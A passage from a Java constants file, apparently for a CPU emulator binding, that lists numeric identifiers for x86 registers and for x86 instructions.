static final int UC_X86_REG_ZMM4 = 190; public static final int UC_X86_REG_ZMM5 = 191; public static final int UC_X86_REG_ZMM6 = 192; public static final int UC_X86_REG_ZMM7 = 193; public static final int UC_X86_REG_ZMM8 = 194; public static final int UC_X86_REG_ZMM9 = 195; public static final int UC_X86_REG_ZMM10 = 196; public static final int UC_X86_REG_ZMM11 = 197; public static final int UC_X86_REG_ZMM12 = 198; public static final int UC_X86_REG_ZMM13 = 199; public static final int UC_X86_REG_ZMM14 = 200; public static final int UC_X86_REG_ZMM15 = 201; public static final int UC_X86_REG_ZMM16 = 202; public static final int UC_X86_REG_ZMM17 = 203; public static final int UC_X86_REG_ZMM18 = 204; public static final int UC_X86_REG_ZMM19 = 205; public static final int UC_X86_REG_ZMM20 = 206; public static final int UC_X86_REG_ZMM21 = 207; public static final int UC_X86_REG_ZMM22 = 208; public static final int UC_X86_REG_ZMM23 = 209; public static final int UC_X86_REG_ZMM24 = 210; public static final int UC_X86_REG_ZMM25 = 211; public static final int UC_X86_REG_ZMM26 = 212; public static final int UC_X86_REG_ZMM27 = 213; public static final int UC_X86_REG_ZMM28 = 214; public static final int UC_X86_REG_ZMM29 = 215; public static final int UC_X86_REG_ZMM30 = 216; public static final int UC_X86_REG_ZMM31 = 217; public static final int UC_X86_REG_R8B = 218; public static final int UC_X86_REG_R9B = 219; public static final int UC_X86_REG_R10B = 220; public static final int UC_X86_REG_R11B = 221; public static final int UC_X86_REG_R12B = 222; public static final int UC_X86_REG_R13B = 223; public static final int UC_X86_REG_R14B = 224; public static final int UC_X86_REG_R15B = 225; public static final int UC_X86_REG_R8D = 226; public static final int UC_X86_REG_R9D = 227; public static final int UC_X86_REG_R10D = 228; public static final int UC_X86_REG_R11D = 229; public static final int UC_X86_REG_R12D = 230; public static final int UC_X86_REG_R13D = 231; public static final int UC_X86_REG_R14D = 232; public static final int UC_X86_REG_R15D = 233; public static final int UC_X86_REG_R8W = 234; public static final int UC_X86_REG_R9W = 235; public static final int UC_X86_REG_R10W = 236; public static final int UC_X86_REG_R11W = 237; public static final int UC_X86_REG_R12W = 238; public static final int UC_X86_REG_R13W = 239; public static final int UC_X86_REG_R14W = 240; public static final int UC_X86_REG_R15W = 241; public static final int UC_X86_REG_IDTR = 242; public static final int UC_X86_REG_GDTR = 243; public static final int UC_X86_REG_LDTR = 244; public static final int UC_X86_REG_TR = 245; public static final int UC_X86_REG_FPCW = 246; public static final int UC_X86_REG_FPTAG = 247; public static final int UC_X86_REG_MSR = 248; public static final int UC_X86_REG_MXCSR = 249; public static final int UC_X86_REG_FS_BASE = 250; public static final int UC_X86_REG_GS_BASE = 251; public static final int UC_X86_REG_FLAGS = 252; public static final int UC_X86_REG_RFLAGS = 253; public static final int UC_X86_REG_FIP = 254; public static final int UC_X86_REG_FCS = 255; public static final int UC_X86_REG_FDP = 256; public static final int UC_X86_REG_FDS = 257; public static final int UC_X86_REG_FOP = 258; public static final int UC_X86_REG_ENDING = 259; // X86 instructions public static final int UC_X86_INS_INVALID = 0; public static final int UC_X86_INS_AAA = 1; public static final int UC_X86_INS_AAD = 2; public static final int UC_X86_INS_AAM = 3; public static final int UC_X86_INS_AAS = 4; public 
static final int UC_X86_INS_FABS = 5; public static final int UC_X86_INS_ADC = 6; public static final int UC_X86_INS_ADCX = 7; public static final int UC_X86_INS_ADD = 8; public static final int UC_X86_INS_ADDPD = 9; public static final int UC_X86_INS_ADDPS = 10; public static final int UC_X86_INS_ADDSD = 11; public static final int UC_X86_INS_ADDSS = 12; public static final int UC_X86_INS_ADDSUBPD = 13; public static final int UC_X86_INS_ADDSUBPS = 14; public static final int UC_X86_INS_FADD = 15; public static final int UC_X86_INS_FIADD = 16; public static final int UC_X86_INS_FADDP = 17; public static final int UC_X86_INS_ADOX = 18; public static final int UC_X86_INS_AESDECLAST = 19; public static final int UC_X86_INS_AESDEC = 20; public static final int UC_X86_INS_AESENCLAST = 21; public static final int UC_X86_INS_AESENC = 22; public static final int UC_X86_INS_AESIMC = 23; public static final int UC_X86_INS_AESKEYGENASSIST = 24; public static final int UC_X86_INS_AND = 25; public static final int UC_X86_INS_ANDN = 26; public static final int UC_X86_INS_ANDNPD = 27; public static final int UC_X86_INS_ANDNPS = 28; public static final int UC_X86_INS_ANDPD = 29; public static final int UC_X86_INS_ANDPS = 30; public static final int UC_X86_INS_ARPL = 31; public static final int UC_X86_INS_BEXTR = 32; public static final int UC_X86_INS_BLCFILL = 33; public static final int UC_X86_INS_BLCI = 34; public static final int UC_X86_INS_BLCIC = 35; public static final int UC_X86_INS_BLCMSK = 36; public static final int UC_X86_INS_BLCS = 37; public static final int UC_X86_INS_BLENDPD = 38; public static final int UC_X86_INS_BLENDPS = 39; public static final int UC_X86_INS_BLENDVPD = 40; public static final int UC_X86_INS_BLENDVPS = 41; public static final int UC_X86_INS_BLSFILL = 42; public static final int UC_X86_INS_BLSI = 43; public static final int UC_X86_INS_BLSIC = 44; public static final int UC_X86_INS_BLSMSK = 45; public static final int UC_X86_INS_BLSR = 46; public static final int UC_X86_INS_BOUND = 47; public static final int UC_X86_INS_BSF = 48; public static final int UC_X86_INS_BSR = 49; public static final int UC_X86_INS_BSWAP = 50; public static final int UC_X86_INS_BT = 51; public static final int UC_X86_INS_BTC = 52; public static final int UC_X86_INS_BTR = 53; public static final int UC_X86_INS_BTS = 54; public static final int UC_X86_INS_BZHI = 55; public static final int UC_X86_INS_CALL = 56; public static final int UC_X86_INS_CBW = 57; public static final int UC_X86_INS_CDQ = 58; public static final int UC_X86_INS_CDQE = 59; public static final int UC_X86_INS_FCHS = 60; public static final int UC_X86_INS_CLAC = 61; public static final int UC_X86_INS_CLC = 62; public static final int UC_X86_INS_CLD = 63; public static final int UC_X86_INS_CLFLUSH = 64; public static final int UC_X86_INS_CLFLUSHOPT = 65; public static final int UC_X86_INS_CLGI = 66; public static final int UC_X86_INS_CLI = 67; public static final int UC_X86_INS_CLTS = 68; public static final int UC_X86_INS_CLWB = 69; public static final int UC_X86_INS_CMC = 70; public static final int UC_X86_INS_CMOVA = 71; public static final int UC_X86_INS_CMOVAE = 72; public static final int UC_X86_INS_CMOVB = 73; public static final int UC_X86_INS_CMOVBE = 74; public static final int UC_X86_INS_FCMOVBE = 75; public static final int UC_X86_INS_FCMOVB = 76; public static final int UC_X86_INS_CMOVE = 77; public static final int UC_X86_INS_FCMOVE = 78; public static final int UC_X86_INS_CMOVG = 79; public static final int 
UC_X86_INS_CMOVGE = 80; public static final int UC_X86_INS_CMOVL = 81; public static final int UC_X86_INS_CMOVLE = 82; public static final int UC_X86_INS_FCMOVNBE = 83; public static final int UC_X86_INS_FCMOVNB = 84; public static final int UC_X86_INS_CMOVNE = 85; public static final int UC_X86_INS_FCMOVNE = 86; public static final int UC_X86_INS_CMOVNO = 87; public static final int UC_X86_INS_CMOVNP = 88; public static final int UC_X86_INS_FCMOVNU = 89; public static final int UC_X86_INS_CMOVNS = 90; public static final int UC_X86_INS_CMOVO = 91; public static final int UC_X86_INS_CMOVP = 92; public static final int UC_X86_INS_FCMOVU = 93; public static final int UC_X86_INS_CMOVS = 94; public static final int UC_X86_INS_CMP = 95; public static final int UC_X86_INS_CMPPD = 96; public static final int UC_X86_INS_CMPPS = 97; public static final int UC_X86_INS_CMPSB = 98; public static final int UC_X86_INS_CMPSD = 99; public static final int UC_X86_INS_CMPSQ = 100; public static final int UC_X86_INS_CMPSS = 101; public static final int UC_X86_INS_CMPSW = 102; public static final int UC_X86_INS_CMPXCHG16B = 103; public static final int UC_X86_INS_CMPXCHG = 104; public static final int UC_X86_INS_CMPXCHG8B = 105; public static final int UC_X86_INS_COMISD = 106; public static final int UC_X86_INS_COMISS = 107; public static final int UC_X86_INS_FCOMP = 108; public static final int UC_X86_INS_FCOMPI = 109; public static final int UC_X86_INS_FCOMI = 110; public static final int UC_X86_INS_FCOM = 111; public static final int UC_X86_INS_FCOS = 112; public static final int UC_X86_INS_CPUID = 113; public static final int UC_X86_INS_CQO = 114; public static final int UC_X86_INS_CRC32 = 115; public static final int UC_X86_INS_CVTDQ2PD = 116; public static final int UC_X86_INS_CVTDQ2PS = 117; public static final int UC_X86_INS_CVTPD2DQ = 118; public static final int UC_X86_INS_CVTPD2PS = 119; public static final int UC_X86_INS_CVTPS2DQ = 120; public static final int UC_X86_INS_CVTPS2PD = 121; public static final int UC_X86_INS_CVTSD2SI = 122; public static final int UC_X86_INS_CVTSD2SS = 123; public static final int UC_X86_INS_CVTSI2SD = 124; public static final int UC_X86_INS_CVTSI2SS = 125; public static final int UC_X86_INS_CVTSS2SD = 126; public static final int UC_X86_INS_CVTSS2SI = 127; public static final int UC_X86_INS_CVTTPD2DQ = 128; public static final int UC_X86_INS_CVTTPS2DQ = 129; public static final int UC_X86_INS_CVTTSD2SI = 130; public static final int UC_X86_INS_CVTTSS2SI = 131; public static final int UC_X86_INS_CWD = 132; public static final int UC_X86_INS_CWDE = 133; public static final int UC_X86_INS_DAA = 134; public static final int UC_X86_INS_DAS = 135; public static final int UC_X86_INS_DATA16 = 136; public static final int UC_X86_INS_DEC = 137; public static final int UC_X86_INS_DIV = 138; public static final int UC_X86_INS_DIVPD = 139; public static final int UC_X86_INS_DIVPS = 140; public static final int UC_X86_INS_FDIVR = 141; public static final int UC_X86_INS_FIDIVR = 142; public static final int UC_X86_INS_FDIVRP = 143; public static final int UC_X86_INS_DIVSD = 144; public static final int UC_X86_INS_DIVSS = 145; public static final int UC_X86_INS_FDIV = 146; public static final int UC_X86_INS_FIDIV = 147; public static final int UC_X86_INS_FDIVP = 148; public static final int UC_X86_INS_DPPD = 149; public static final int UC_X86_INS_DPPS = 150; public static final int UC_X86_INS_RET = 151; public static final int UC_X86_INS_ENCLS = 152; public static final int 
UC_X86_INS_ENCLU = 153; public static final int UC_X86_INS_ENTER = 154; public static final int UC_X86_INS_EXTRACTPS = 155; public static final int UC_X86_INS_EXTRQ = 156; public static final int UC_X86_INS_F2XM1 = 157; public static final int UC_X86_INS_LCALL = 158; public static final int UC_X86_INS_LJMP = 159; public static final int UC_X86_INS_FBLD = 160; public static final int UC_X86_INS_FBSTP = 161; public static final int UC_X86_INS_FCOMPP = 162; public static final int UC_X86_INS_FDECSTP = 163; public static final int UC_X86_INS_FEMMS = 164; public static final int UC_X86_INS_FFREE = 165; public static final int UC_X86_INS_FICOM = 166; public static final int UC_X86_INS_FICOMP = 167; public static final int UC_X86_INS_FINCSTP = 168; public static final int UC_X86_INS_FLDCW = 169; public static final int UC_X86_INS_FLDENV = 170; public static final int UC_X86_INS_FLDL2E = 171; public static final int UC_X86_INS_FLDL2T = 172; public static final int UC_X86_INS_FLDLG2 = 173; public static final int UC_X86_INS_FLDLN2 = 174; public static final int UC_X86_INS_FLDPI = 175; public static final int UC_X86_INS_FNCLEX = 176; public static final int UC_X86_INS_FNINIT = 177; public static final int UC_X86_INS_FNOP = 178; public static final int UC_X86_INS_FNSTCW = 179; public static final int UC_X86_INS_FNSTSW = 180; public static final int UC_X86_INS_FPATAN = 181; public static final int UC_X86_INS_FPREM = 182; public static final int UC_X86_INS_FPREM1 = 183; public static final int UC_X86_INS_FPTAN = 184; public static final int UC_X86_INS_FFREEP = 185; public static final int UC_X86_INS_FRNDINT = 186; public static final int UC_X86_INS_FRSTOR = 187; public static final int UC_X86_INS_FNSAVE = 188; public static final int UC_X86_INS_FSCALE = 189; public static final int UC_X86_INS_FSETPM = 190; public static final int UC_X86_INS_FSINCOS = 191; public static final int UC_X86_INS_FNSTENV = 192; public static final int UC_X86_INS_FXAM = 193; public static final int UC_X86_INS_FXRSTOR = 194; public static final int UC_X86_INS_FXRSTOR64 = 195; public static final int UC_X86_INS_FXSAVE = 196; public static final int UC_X86_INS_FXSAVE64 = 197; public static final int UC_X86_INS_FXTRACT = 198; public static final int UC_X86_INS_FYL2X = 199; public static final int UC_X86_INS_FYL2XP1 = 200; public static final int UC_X86_INS_MOVAPD = 201; public static final int UC_X86_INS_MOVAPS = 202; public static final int UC_X86_INS_ORPD = 203; public static final int UC_X86_INS_ORPS = 204; public static final int UC_X86_INS_VMOVAPD = 205; public static final int UC_X86_INS_VMOVAPS = 206; public static final int UC_X86_INS_XORPD = 207; public static final int UC_X86_INS_XORPS = 208; public static final int UC_X86_INS_GETSEC = 209; public static final int UC_X86_INS_HADDPD = 210; public static final int UC_X86_INS_HADDPS = 211; public static final int UC_X86_INS_HLT = 212; public static final int UC_X86_INS_HSUBPD = 213; public static final int UC_X86_INS_HSUBPS = 214; public static final int UC_X86_INS_IDIV = 215; public static final int UC_X86_INS_FILD = 216; public static final int UC_X86_INS_IMUL = 217; public static final int UC_X86_INS_IN = 218; public static final int UC_X86_INS_INC = 219; public static final int UC_X86_INS_INSB = 220; public static final int UC_X86_INS_INSERTPS = 221; public static final int UC_X86_INS_INSERTQ = 222; public static final int UC_X86_INS_INSD = 223; public static final int UC_X86_INS_INSW = 224; public static final int UC_X86_INS_INT = 225; public static final int 
UC_X86_INS_INT1 = 226; public static final int UC_X86_INS_INT3 = 227; public static final int UC_X86_INS_INTO = 228; public static final int UC_X86_INS_INVD = 229; public static final int UC_X86_INS_INVEPT = 230; public static final int UC_X86_INS_INVLPG = 231; public static final int UC_X86_INS_INVLPGA = 232; public static final int UC_X86_INS_INVPCID = 233; public static final int UC_X86_INS_INVVPID = 234; public static final int UC_X86_INS_IRET = 235; public static final int UC_X86_INS_IRETD = 236; public static final int UC_X86_INS_IRETQ = 237; public static final int UC_X86_INS_FISTTP = 238; public static final int UC_X86_INS_FIST = 239; public static final int UC_X86_INS_FISTP = 240; public static final int UC_X86_INS_UCOMISD = 241; public static final int UC_X86_INS_UCOMISS = 242; public static final int UC_X86_INS_VCOMISD = 243; public static final int UC_X86_INS_VCOMISS = 244; public static final int UC_X86_INS_VCVTSD2SS = 245; public static final int UC_X86_INS_VCVTSI2SD = 246; public static final int UC_X86_INS_VCVTSI2SS = 247; public static final int UC_X86_INS_VCVTSS2SD = 248; public static final int UC_X86_INS_VCVTTSD2SI = 249; public static final int UC_X86_INS_VCVTTSD2USI = 250; public static final int UC_X86_INS_VCVTTSS2SI = 251; public static final int UC_X86_INS_VCVTTSS2USI = 252; public static final int UC_X86_INS_VCVTUSI2SD = 253; public static final int UC_X86_INS_VCVTUSI2SS = 254; public static final int UC_X86_INS_VUCOMISD = 255; public static final int UC_X86_INS_VUCOMISS = 256; public static final int UC_X86_INS_JAE = 257; public static final int UC_X86_INS_JA = 258; public static final int UC_X86_INS_JBE = 259; public static final int UC_X86_INS_JB = 260; public static final int UC_X86_INS_JCXZ = 261; public static final int UC_X86_INS_JECXZ = 262; public static final int UC_X86_INS_JE = 263; public static final int UC_X86_INS_JGE = 264; public static final int UC_X86_INS_JG = 265; public static final int UC_X86_INS_JLE = 266; public static final int UC_X86_INS_JL = 267; public static final int UC_X86_INS_JMP = 268; public static final int UC_X86_INS_JNE = 269; public static final int UC_X86_INS_JNO = 270; public static final int UC_X86_INS_JNP = 271; public static final int UC_X86_INS_JNS = 272; public static final int UC_X86_INS_JO = 273; public static final int UC_X86_INS_JP = 274; public static final int UC_X86_INS_JRCXZ = 275; public static final int UC_X86_INS_JS = 276; public static final int UC_X86_INS_KANDB = 277; public static final int UC_X86_INS_KANDD = 278; public static final int UC_X86_INS_KANDNB = 279; public static final int UC_X86_INS_KANDND = 280; public static final int UC_X86_INS_KANDNQ = 281; public static final int UC_X86_INS_KANDNW = 282; public static final int UC_X86_INS_KANDQ = 283; public static final int UC_X86_INS_KANDW = 284; public static final int UC_X86_INS_KMOVB = 285; public static final int UC_X86_INS_KMOVD = 286; public static final int UC_X86_INS_KMOVQ = 287; public static final int UC_X86_INS_KMOVW = 288; public static final int UC_X86_INS_KNOTB = 289; public static final int UC_X86_INS_KNOTD = 290; public static final int UC_X86_INS_KNOTQ = 291; public static final int UC_X86_INS_KNOTW = 292; public static final int UC_X86_INS_KORB = 293; public static final int UC_X86_INS_KORD = 294; public static final int UC_X86_INS_KORQ = 295; public static final int UC_X86_INS_KORTESTB = 296; public static final int UC_X86_INS_KORTESTD = 297; public static final int UC_X86_INS_KORTESTQ = 298; public static final int 
UC_X86_INS_KORTESTW = 299; public static final int UC_X86_INS_KORW = 300; public static final int UC_X86_INS_KSHIFTLB = 301; public static final int UC_X86_INS_KSHIFTLD = 302; public static final int UC_X86_INS_KSHIFTLQ = 303; public static final int UC_X86_INS_KSHIFTLW = 304; public static final int UC_X86_INS_KSHIFTRB = 305; public static final int UC_X86_INS_KSHIFTRD = 306; public static final int UC_X86_INS_KSHIFTRQ = 307; public static final int UC_X86_INS_KSHIFTRW = 308; public static final int UC_X86_INS_KUNPCKBW = 309; public static final int UC_X86_INS_KXNORB = 310; public static final int UC_X86_INS_KXNORD = 311; public static final int UC_X86_INS_KXNORQ = 312; public static final int UC_X86_INS_KXNORW = 313; public static final int UC_X86_INS_KXORB = 314; public static final int UC_X86_INS_KXORD = 315; public static final int UC_X86_INS_KXORQ = 316; public static final int UC_X86_INS_KXORW = 317; public static final int UC_X86_INS_LAHF = 318; public static final int UC_X86_INS_LAR = 319; public static final int UC_X86_INS_LDDQU = 320; public static final int UC_X86_INS_LDMXCSR = 321; public static final int UC_X86_INS_LDS = 322; public static final int UC_X86_INS_FLDZ = 323; public static final int UC_X86_INS_FLD1 = 324; public static final int UC_X86_INS_FLD = 325; public static final int UC_X86_INS_LEA = 326; public static final int UC_X86_INS_LEAVE = 327; public static final int UC_X86_INS_LES = 328; public static final int UC_X86_INS_LFENCE = 329; public static final int UC_X86_INS_LFS = 330; public static final int UC_X86_INS_LGDT = 331; public static final int UC_X86_INS_LGS = 332; public static final int UC_X86_INS_LIDT = 333; public static final int UC_X86_INS_LLDT = 334; public static final int UC_X86_INS_LMSW = 335; public static final int UC_X86_INS_OR = 336; public static final int UC_X86_INS_SUB = 337; public static final int UC_X86_INS_XOR = 338; public static final int UC_X86_INS_LODSB = 339; public static final int UC_X86_INS_LODSD = 340; public static final int UC_X86_INS_LODSQ = 341; public static final int UC_X86_INS_LODSW = 342; public static final int UC_X86_INS_LOOP = 343; public static final int UC_X86_INS_LOOPE = 344; public static final int UC_X86_INS_LOOPNE = 345; public static final int UC_X86_INS_RETF = 346; public static final int UC_X86_INS_RETFQ = 347; public static final int UC_X86_INS_LSL = 348; public static final int UC_X86_INS_LSS = 349; public static final int UC_X86_INS_LTR = 350; public static final int UC_X86_INS_XADD = 351; public static final int UC_X86_INS_LZCNT = 352; public static final int UC_X86_INS_MASKMOVDQU = 353; public static final int UC_X86_INS_MAXPD = 354; public static final int UC_X86_INS_MAXPS = 355; public static final int UC_X86_INS_MAXSD = 356; public static final int UC_X86_INS_MAXSS = 357; public static final int UC_X86_INS_MFENCE = 358; public static final int UC_X86_INS_MINPD = 359; public static final int UC_X86_INS_MINPS = 360; public static final int UC_X86_INS_MINSD = 361; public static final int UC_X86_INS_MINSS = 362; public static final int UC_X86_INS_CVTPD2PI = 363; public static final int UC_X86_INS_CVTPI2PD = 364; public static final int UC_X86_INS_CVTPI2PS = 365; public static final int UC_X86_INS_CVTPS2PI = 366; public static final int UC_X86_INS_CVTTPD2PI = 367; public static final int UC_X86_INS_CVTTPS2PI = 368; public static final int UC_X86_INS_EMMS = 369; public static final int UC_X86_INS_MASKMOVQ = 370; public static final int UC_X86_INS_MOVD = 371; public static final int UC_X86_INS_MOVDQ2Q = 
372; public static final int UC_X86_INS_MOVNTQ = 373; public static final int UC_X86_INS_MOVQ2DQ = 374; public static final int UC_X86_INS_MOVQ = 375; public static final int UC_X86_INS_PABSB = 376; public static final int UC_X86_INS_PABSD = 377; public static final int UC_X86_INS_PABSW = 378; public static final int UC_X86_INS_PACKSSDW = 379; public static final int UC_X86_INS_PACKSSWB = 380; public static final int UC_X86_INS_PACKUSWB = 381; public static final int UC_X86_INS_PADDB = 382; public static final int UC_X86_INS_PADDD = 383; public static final int UC_X86_INS_PADDQ = 384; public static final int UC_X86_INS_PADDSB = 385; public static final int UC_X86_INS_PADDSW = 386; public static final int UC_X86_INS_PADDUSB = 387; public static final int UC_X86_INS_PADDUSW = 388; public static final int UC_X86_INS_PADDW = 389; public static final int UC_X86_INS_PALIGNR = 390; public static final int UC_X86_INS_PANDN = 391; public static final int UC_X86_INS_PAND = 392; public static final int UC_X86_INS_PAVGB = 393; public static final int UC_X86_INS_PAVGW = 394; public static final int UC_X86_INS_PCMPEQB = 395; public static final int UC_X86_INS_PCMPEQD = 396; public static final int UC_X86_INS_PCMPEQW = 397; public static final int UC_X86_INS_PCMPGTB = 398; public static final int UC_X86_INS_PCMPGTD = 399; public static final int UC_X86_INS_PCMPGTW = 400; public static final int UC_X86_INS_PEXTRW = 401; public static final int UC_X86_INS_PHADDSW = 402; public static final int UC_X86_INS_PHADDW = 403; public static final int UC_X86_INS_PHADDD = 404; public static final int UC_X86_INS_PHSUBD = 405; public static final int UC_X86_INS_PHSUBSW = 406; public static final int UC_X86_INS_PHSUBW = 407; public static final int UC_X86_INS_PINSRW = 408; public static final int UC_X86_INS_PMADDUBSW = 409; public static final int UC_X86_INS_PMADDWD = 410; public static final int UC_X86_INS_PMAXSW = 411; public static final int UC_X86_INS_PMAXUB = 412; public static final int UC_X86_INS_PMINSW = 413; public static final int UC_X86_INS_PMINUB = 414; public static final int UC_X86_INS_PMOVMSKB = 415; public static final int UC_X86_INS_PMULHRSW = 416; public static final int UC_X86_INS_PMULHUW = 417; public static final int UC_X86_INS_PMULHW = 418; public static final int UC_X86_INS_PMULLW = 419; public static final int UC_X86_INS_PMULUDQ = 420; public static final int UC_X86_INS_POR = 421; public static final int UC_X86_INS_PSADBW = 422; public static final int UC_X86_INS_PSHUFB = 423; public static final int UC_X86_INS_PSHUFW = 424; public static final int UC_X86_INS_PSIGNB = 425; public static final int UC_X86_INS_PSIGND = 426; public static final int UC_X86_INS_PSIGNW = 427; public static final int UC_X86_INS_PSLLD = 428; public static final int UC_X86_INS_PSLLQ = 429; public static final int UC_X86_INS_PSLLW = 430; public static final int UC_X86_INS_PSRAD = 431; public static final int UC_X86_INS_PSRAW = 432; public static final int UC_X86_INS_PSRLD = 433; public static final int UC_X86_INS_PSRLQ = 434; public static final int UC_X86_INS_PSRLW = 435; public static final int UC_X86_INS_PSUBB = 436; public static final int UC_X86_INS_PSUBD = 437; public static final int UC_X86_INS_PSUBQ = 438; public static final int UC_X86_INS_PSUBSB = 439; public static final int UC_X86_INS_PSUBSW = 440; public static final int UC_X86_INS_PSUBUSB = 441; public static final int UC_X86_INS_PSUBUSW = 442; public static final int UC_X86_INS_PSUBW = 443; public static final int UC_X86_INS_PUNPCKHBW = 444; public static 
final int UC_X86_INS_PUNPCKHDQ = 445; public static final int UC_X86_INS_PUNPCKHWD = 446; public static final int UC_X86_INS_PUNPCKLBW = 447; public static final int UC_X86_INS_PUNPCKLDQ = 448; public static final int UC_X86_INS_PUNPCKLWD = 449; public static final int UC_X86_INS_PXOR = 450; public static final int UC_X86_INS_MONITOR = 451; public static final int UC_X86_INS_MONTMUL = 452; public static final int UC_X86_INS_MOV = 453; public static final int UC_X86_INS_MOVABS = 454; public static final int UC_X86_INS_MOVBE = 455; public static final int UC_X86_INS_MOVDDUP = 456; public static final int UC_X86_INS_MOVDQA = 457; public static final int UC_X86_INS_MOVDQU = 458; public static final int UC_X86_INS_MOVHLPS = 459; public static final int UC_X86_INS_MOVHPD = 460; public static final int UC_X86_INS_MOVHPS = 461; public static final int UC_X86_INS_MOVLHPS = 462; public static final int UC_X86_INS_MOVLPD = 463; public static final int UC_X86_INS_MOVLPS = 464; public static final int UC_X86_INS_MOVMSKPD = 465; public static final int UC_X86_INS_MOVMSKPS = 466; public static final int UC_X86_INS_MOVNTDQA = 467; public static final int UC_X86_INS_MOVNTDQ = 468; public static final int UC_X86_INS_MOVNTI = 469; public static final int UC_X86_INS_MOVNTPD = 470; public static final int UC_X86_INS_MOVNTPS = 471; public static final int UC_X86_INS_MOVNTSD = 472; public static final int UC_X86_INS_MOVNTSS = 473; public static final int UC_X86_INS_MOVSB = 474; public static final int UC_X86_INS_MOVSD = 475; public static final int UC_X86_INS_MOVSHDUP = 476; public static final int UC_X86_INS_MOVSLDUP = 477; public static final int UC_X86_INS_MOVSQ = 478; public static final int UC_X86_INS_MOVSS = 479; public static final int UC_X86_INS_MOVSW = 480; public static final int UC_X86_INS_MOVSX = 481; public static final int UC_X86_INS_MOVSXD = 482; public static final int UC_X86_INS_MOVUPD = 483; public static final int UC_X86_INS_MOVUPS = 484; public static final int UC_X86_INS_MOVZX = 485; public static final int UC_X86_INS_MPSADBW = 486; public static final int UC_X86_INS_MUL = 487; public static final int UC_X86_INS_MULPD = 488; public static final int UC_X86_INS_MULPS = 489; public static final int UC_X86_INS_MULSD = 490; public static final int UC_X86_INS_MULSS = 491; public static final int UC_X86_INS_MULX = 492; public static final int UC_X86_INS_FMUL = 493; public static final int UC_X86_INS_FIMUL = 494; public static final int UC_X86_INS_FMULP = 495; public static final int UC_X86_INS_MWAIT = 496; public static final int UC_X86_INS_NEG = 497; public static final int UC_X86_INS_NOP = 498; public static final int UC_X86_INS_NOT = 499; public static final int UC_X86_INS_OUT = 500; public static final int UC_X86_INS_OUTSB = 501; public static final int UC_X86_INS_OUTSD = 502; public static final int UC_X86_INS_OUTSW = 503; public static final int UC_X86_INS_PACKUSDW = 504; public static final int UC_X86_INS_PAUSE = 505; public static final int UC_X86_INS_PAVGUSB = 506; public static final int UC_X86_INS_PBLENDVB = 507; public static final int UC_X86_INS_PBLENDW = 508; public static final int UC_X86_INS_PCLMULQDQ = 509; public static final int UC_X86_INS_PCMPEQQ = 510; public static final int UC_X86_INS_PCMPESTRI = 511; public static final int UC_X86_INS_PCMPESTRM = 512; public static final int UC_X86_INS_PCMPGTQ = 513; public static final int UC_X86_INS_PCMPISTRI = 514; public static final int UC_X86_INS_PCMPISTRM = 515; public static final int UC_X86_INS_PCOMMIT = 516; public static final int 
UC_X86_INS_PDEP = 517; public static final int UC_X86_INS_PEXT = 518; public static final int UC_X86_INS_PEXTRB = 519; public static final int UC_X86_INS_PEXTRD = 520; public static final int UC_X86_INS_PEXTRQ = 521; public static final int UC_X86_INS_PF2ID = 522; public static final int UC_X86_INS_PF2IW = 523; public static final int UC_X86_INS_PFACC = 524; public static final int UC_X86_INS_PFADD = 525; public static final int UC_X86_INS_PFCMPEQ = 526; public static final int UC_X86_INS_PFCMPGE = 527; public static final int UC_X86_INS_PFCMPGT = 528; public static final int UC_X86_INS_PFMAX = 529; public static final int UC_X86_INS_PFMIN = 530; public static final int UC_X86_INS_PFMUL = 531; public static final int UC_X86_INS_PFNACC = 532; public static final int UC_X86_INS_PFPNACC = 533; public static final int UC_X86_INS_PFRCPIT1 = 534; public static final int UC_X86_INS_PFRCPIT2 = 535; public static final int UC_X86_INS_PFRCP = 536; public static final int UC_X86_INS_PFRSQIT1 = 537; public static final int UC_X86_INS_PFRSQRT = 538; public static final int UC_X86_INS_PFSUBR = 539; public static final int UC_X86_INS_PFSUB = 540; public static final int UC_X86_INS_PHMINPOSUW = 541; public static final int UC_X86_INS_PI2FD = 542; public static final int UC_X86_INS_PI2FW = 543; public static final int UC_X86_INS_PINSRB = 544; public static final int UC_X86_INS_PINSRD = 545; public static final int UC_X86_INS_PINSRQ = 546; public static final int UC_X86_INS_PMAXSB = 547; public static final int UC_X86_INS_PMAXSD = 548; public static final int UC_X86_INS_PMAXUD = 549; public static final int UC_X86_INS_PMAXUW = 550; public static final int UC_X86_INS_PMINSB = 551; public static final int UC_X86_INS_PMINSD = 552; public static final int UC_X86_INS_PMINUD = 553; public static final int UC_X86_INS_PMINUW = 554; public static final int UC_X86_INS_PMOVSXBD = 555; public static final int UC_X86_INS_PMOVSXBQ = 556; public static final int UC_X86_INS_PMOVSXBW = 557; public static final int UC_X86_INS_PMOVSXDQ = 558; public static final int UC_X86_INS_PMOVSXWD = 559; public static final int UC_X86_INS_PMOVSXWQ = 560; public static final int UC_X86_INS_PMOVZXBD = 561; public static final int UC_X86_INS_PMOVZXBQ = 562; public static final int UC_X86_INS_PMOVZXBW = 563; public static final int UC_X86_INS_PMOVZXDQ = 564; public static final int UC_X86_INS_PMOVZXWD = 565; public static final int UC_X86_INS_PMOVZXWQ = 566; public static final int UC_X86_INS_PMULDQ = 567; public static final int UC_X86_INS_PMULHRW = 568; public static final int UC_X86_INS_PMULLD = 569; public static final int UC_X86_INS_POP = 570; public static final int UC_X86_INS_POPAW = 571; public static final int UC_X86_INS_POPAL = 572; public static final int UC_X86_INS_POPCNT = 573; public static final int UC_X86_INS_POPF = 574; public static final int UC_X86_INS_POPFD = 575; public static final int UC_X86_INS_POPFQ = 576; public static final int UC_X86_INS_PREFETCH = 577; public static final int UC_X86_INS_PREFETCHNTA = 578; public static final int UC_X86_INS_PREFETCHT0 = 579; public static final int UC_X86_INS_PREFETCHT1 = 580; public static final int UC_X86_INS_PREFETCHT2 = 581; public static final int UC_X86_INS_PREFETCHW = 582; public static final int UC_X86_INS_PSHUFD = 583; public static final int UC_X86_INS_PSHUFHW = 584; public static final int UC_X86_INS_PSHUFLW = 585; public static final int UC_X86_INS_PSLLDQ = 586; public static final int UC_X86_INS_PSRLDQ = 587; public static final int UC_X86_INS_PSWAPD = 588; public 
